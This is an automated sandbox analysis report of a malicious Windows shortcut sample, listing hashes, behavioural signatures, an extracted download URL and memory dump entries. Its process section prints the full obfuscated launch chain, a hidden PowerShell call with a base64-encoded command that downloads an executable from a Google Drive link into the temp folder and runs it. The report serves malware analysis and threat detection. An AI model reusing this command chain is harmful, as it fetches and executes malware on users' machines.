Analysis
-
max time kernel
118s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
11-05-2024 11:54
Static task
static1
Behavioral task
behavioral1
Sample
34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
Resource
win10v2004-20240226-en
General
-
Target
34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
-
Size
3KB
-
MD5
34759a7b254af5d435a747330e172602
-
SHA1
d0d2d2abc845103bc0655fd6fcc74adc332d34f5
-
SHA256
f79b3fb8b11748b9b8a68c316c805366e05f34b9c2bf41814191d03df53522ed
-
SHA512
4662b3e3f21ef000f569acb096f697e074b4425df67c3d3b34611cc65873cd02f17cf80edf5ba2a3b3287bd16e268d262f2f7706de5c275afbffc587e7b5bd72
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1SCyn_ZPahvp66p8IWBybgyebqvi_tKj8
Signatures
-
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 5 3048 powershell.exe 7 3048 powershell.exe 10 3048 powershell.exe 13 3048 powershell.exe 15 3048 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2656 powershell.exe 3048 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2656 powershell.exe 3048 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 3048 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exepowershell.execmd.exedescription pid process target process PID 2380 wrote to memory of 2656 2380 cmd.exe powershell.exe PID 2380 wrote to memory of 2656 2380 cmd.exe powershell.exe PID 2380 wrote to memory of 2656 2380 cmd.exe powershell.exe PID 2656 wrote to memory of 2460 2656 powershell.exe cmd.exe PID 2656 wrote to memory of 2460 2656 powershell.exe cmd.exe PID 2656 wrote to memory of 2460 2656 powershell.exe cmd.exe PID 2460 wrote to memory of 3048 2460 cmd.exe powershell.exe PID 2460 wrote to memory of 3048 2460 cmd.exe powershell.exe PID 2460 wrote to memory of 3048 2460 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\34759a7b254af5d435a747330e172602_JaffaCakes118.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd /c pOWersHELL.exe -Ex bypasS -W hiddeN -Ec CQAMAAkAKAAJACAACQBOAEUAdwAtAG8AQgBqAGUAQwB0AAkACwAgAHMAeQBTAFQARQBtAC4ATgBlAHQALgB3AGUAQgBDAEwAaQBFAG4AVAAJAAkAIAApAC4ARABvAFcATgBMAE8AYQBEAEYASQBMAEUAKAAgAAkAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAFMAQwB5AG4AXwBaAFAAYQBoAHYAcAA2ADYAcAA4AEkAVwBCAHkAYgBnAHkAZQBiAHEAdgBpAF8AdABLAGoAOAAdIAkACwAgACwAIAALACAAHSAkAEUAbgB2ADoAVABlAG0AcABcAHAAZABmAHIAcgB0AC4AZQB4AGUAHSAgAAkAIAApAAkACQAJADsAIAAJAAkASQBuAFYAbwBLAGUALQBJAFQAZQBNACAAIAAgAB0gJABFAE4AVgA6AHQARQBtAHAAXABwAGQAZgByAHIAdAAuAGUAeABlAB0g2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c pOWersHELL.exe -Ex bypasS -W hiddeN -Ec CQAMAAkAKAAJACAACQBOAEUAdwAtAG8AQgBqAGUAQwB0AAkACwAgAHMAeQBTAFQARQBtAC4ATgBlAHQALgB3AGUAQgBDAEwAaQBFAG4AVAAJAAkAIAApAC4ARABvAFcATgBMAE8AYQBEAEYASQBMAEUAKAAgAAkAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAFMAQwB5AG4AXwBaAFAAYQBoAHYAcAA2ADYAcAA4AEkAVwBCAHkAYgBnAHkAZQBiAHEAdgBpAF8AdABLAGoAOAAdIAkACwAgACwAIAALACAAHSAkAEUAbgB2ADoAVABlAG0AcABcAHAAZABmAHIAcgB0AC4AZQB4AGUAHSAgAAkAIAApAAkACQAJADsAIAAJAAkASQBuAFYAbwBLAGUALQBJAFQAZQBNACAAIAAgAB0gJABFAE4AVgA6AHQARQBtAHAAXABwAGQAZgByAHIAdAAuAGUAeABlAB0g3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOWersHELL.exe -Ex bypasS -W hiddeN -Ec CQAMAAkAKAAJACAACQBOAEUAdwAtAG8AQgBqAGUAQwB0AAkACwAgAHMAeQBTAFQARQBtAC4ATgBlAHQALgB3AGUAQgBDAEwAaQBFAG4AVAAJAAkAIAApAC4ARABvAFcATgBMAE8AYQBEAEYASQBMAEUAKAAgAAkAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAFMAQwB5AG4AXwBaAFAAYQBoAHYAcAA2ADYAcAA4AEkAVwBCAHkAYgBnAHkAZQBiAHEAdgBpAF8AdABLAGoAOAAdIAkACwAgACwAIAALACAAHSAkAEUAbgB2ADoAVABlAG0AcABcAHAAZABmAHIAcgB0AC4AZQB4AGUAHSAgAAkAIAApAAkACQAJADsAIAAJAAkASQBuAFYAbwBLAGUALQBJAFQAZQBNACAAIAAgAB0gJABFAE4AVgA6AHQARQBtAHAAXABwAGQAZgByAHIAdAAuAGUAeABlAB0g4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2656-38-0x000007FEF593E000-0x000007FEF593F000-memory.dmpFilesize
4KB
-
memory/2656-39-0x000000001B750000-0x000000001BA32000-memory.dmpFilesize
2.9MB
-
memory/2656-40-0x000007FEF5680000-0x000007FEF601D000-memory.dmpFilesize
9.6MB
-
memory/2656-43-0x000007FEF5680000-0x000007FEF601D000-memory.dmpFilesize
9.6MB
-
memory/2656-42-0x000007FEF5680000-0x000007FEF601D000-memory.dmpFilesize
9.6MB
-
memory/2656-44-0x000007FEF5680000-0x000007FEF601D000-memory.dmpFilesize
9.6MB
-
memory/2656-45-0x000007FEF5680000-0x000007FEF601D000-memory.dmpFilesize
9.6MB
-
memory/2656-41-0x0000000001EE0000-0x0000000001EE8000-memory.dmpFilesize
32KB
-
memory/2656-64-0x000007FEF5680000-0x000007FEF601D000-memory.dmpFilesize
9.6MB